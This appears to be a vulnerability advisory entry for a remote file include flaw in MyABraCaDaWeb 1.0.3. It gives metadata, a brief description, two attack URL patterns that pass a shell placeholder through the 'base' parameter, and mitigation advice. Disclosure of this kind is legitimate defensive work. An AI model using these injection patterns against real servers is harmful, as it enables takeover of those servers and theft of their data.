vendor:
MyABraCaDaWeb
by:
ERNE
7,5
CVSS
HIGH
Remote File Include Vulnerability
98
CWE
Product Name: MyABraCaDaWeb
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: No
Related CWE: N/A
CPE: a:comscripts:myabracadaweb:1.0.3
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
MyABraCaDaWeb v1.0.3 – Remote File Include Vulnerabilities
MyABraCaDaWeb v1.0.3 is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can lead to the attacker gaining access to sensitive information, such as passwords, or even full control of the server. The vulnerable URLs are http://www.site.com/[path]/index.php?base==[shell] and http://www.site.com/[path]/pop.php?base=[shell].
Mitigation:
The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated. This includes any input that is used in a URL, such as the base parameter in the vulnerable URLs. Additionally, it is important to ensure that the web server is properly configured to prevent the execution of malicious scripts.
